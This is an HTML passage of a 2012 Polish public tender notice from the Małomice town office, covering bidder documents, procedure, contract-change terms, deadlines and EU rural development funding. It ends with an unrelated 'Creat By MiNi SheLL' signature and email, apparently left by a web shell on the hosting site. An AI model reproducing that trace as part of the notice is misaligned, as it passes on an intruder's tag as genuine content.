<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie z art.22 ust.1
Pełnomocnictwo- w przypadku wspólnego ubiegania się o udzielenie zamówienia
Kosztorys ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień publicznych  dopuszcza możliwość  zmian postanowień zawartej umowy w stosunku do treści oferty  na podstawie, której dokonano wyboru Wykonawcy: 
1) w zakresie wydłużenia terminu obowiązywania umowy , pod warunkiem  że:  
   a) zachodzi konieczność wykonania robót dodatkowych na zadaniu o wykonanie 
       robót   budowanych, których wykonanie w sposób obiektywny uniemożliwia 
       terminowe  zakończenie realizacji przedmiotu zamówienia,  
   b) prace objęte umową o wykonanie robót budowlanych zostały wstrzymane 
       przez  właściwe organy z przyczyn niezależnych od Wykonawcy, 
   c) wystąpiły nietypowe dla  danej pory roku  warunki atmosferyczne, które ze 
       względów obiektywnych uniemożliwiają wykonanie robót budowlanych zgodnie 
       z normami  techniczno-budowlanymi, co uniemożliwia  terminowe zakończenie 
       realizacji   przedmiotu umowy,
   d) zachodzi konieczność uzyskania niemożliwych do przewidzenia na etapie 
       planowania inwestycji o wykonanie robót budowlanych danych,  zgody osób  
       trzecich  lub  właściwych organów;
2) w zakresie zmniejszenia przedmiotu zamówienia pod  warunkiem, że: 
   a) z niemożliwych do przewidzenia na etapie planowania inwestycji o roboty 
       budowlane  przyczyn, wykonanie całości przedmiotu zamówienia napotyka na 
       istotne trudności, których przezwyciężenie wymagałoby poniesienia 
       niewspółmiernie wysokich kosztów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://malomice.bip.pbox.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Małomicach, 67-320 Małomice 
Plac Konstytucji 3 Maja 1 - na pisemny wniosek Wykonawcy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 12:00, miejsce: Urząd Miejski w Małomicach, 67-320 Małomice, 
Plac Konstytucji 3 Maja 1, pok. nr 10 -Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Finansowanie: środki własne oraz środki pochodzące z Unii Europejskiej z Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania 313,322,323  Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com